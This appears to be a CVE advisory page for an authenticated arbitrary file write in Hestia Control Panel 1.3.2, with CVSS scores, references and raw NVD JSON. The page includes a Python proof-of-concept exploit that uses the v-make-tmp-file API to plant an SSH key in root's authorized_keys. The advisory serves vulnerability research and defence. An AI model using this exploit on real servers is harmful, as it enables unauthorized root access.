CVE-2021-47871

Description

Hestia Control Panel 1.3.2 contains an arbitrary file write vulnerability that allows authenticated attackers to write files to arbitrary locations using the API index.php endpoint. Attackers can exploit the v-make-tmp-file command to write SSH keys or other content to specific file paths on the server.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Hestia Control Panel 1.3.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2021-47871 PoC - Hestia Control Panel Arbitrary File Write
"""
import requests
import json

TARGET_URL = "https://TARGET_IP:8083/index.php"
USERNAME = "attacker"
PASSWORD = "password"

def exploit_arbitrary_file_write():
    """
    Exploit arbitrary file write via v-make-tmp-file API endpoint
    """
    # Login to get session
    login_data = {
        "user": USERNAME,
        "password": PASSWORD,
        "token": ""
    }
    
    session = requests.Session()
    login_response = session.post(f"{TARGET_URL}?api=json", json=login_data)
    
    if login_response.status_code != 200:
        print("[-] Login failed")
        return False
    
    # Write SSH key to authorized_keys
    ssh_pub_key = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC7..."
    payload = {
        "cmd": "v-make-tmp-file",
        "arg1": ssh_pub_key,
        "arg2": "/root/.ssh/authorized_keys"
    }
    
    response = session.post(f"{TARGET_URL}?api=json", json=payload)
    
    if response.status_code == 200:
        print("[+] File written successfully to /root/.ssh/authorized_keys")
        return True
    else:
        print("[-] Exploitation failed")
        return False

if __name__ == "__main__":
    exploit_arbitrary_file_write()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2021-47871
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2021-47871
[3] CVE Details https://www.cvedetails.com/cve/CVE-2021-47871/
[4] VulDB https://vuldb.com/cve/CVE-2021-47871
[5] https://github.com/hestiacp/hestiacp
[6] https://hestiacp.com/
[7] https://www.exploit-db.com/exploits/49667
[8] https://www.vulncheck.com/advisories/hestia-control-panel-arbitrary-file-write

Raw JSON Data

JSON

{"cve": {"id": "CVE-2021-47871", "sourceIdentifier": "[email protected]", "published": "2026-01-21T18:16:20.190", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Hestia Control Panel 1.3.2 contains an arbitrary file write vulnerability that allows authenticated attackers to write files to arbitrary locations using the API index.php endpoint. Attackers can exploit the v-make-tmp-file command to write SSH keys or other content to specific file paths on the server."}, {"lang": "es", "value": "Hestia Control Panel 1.3.2 contiene una vulnerabilidad de escritura de archivos arbitrarios que permite a atacantes autenticados escribir archivos en ubicaciones arbitrarias utilizando el endpoint API index.php. Los atacantes pueden explotar el comando v-make-tmp-file para escribir claves SSH u otro contenido en rutas de archivo específicas en el servidor."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-73"}]}], "references": [{"url": "https://github.com/hestiacp/hestiacp", "source": "[email protected]"}, {"url": "https://hestiacp.com/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49667", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/hestia-control-panel-arbitrary-file-write", "source": "[email protected]"}]}}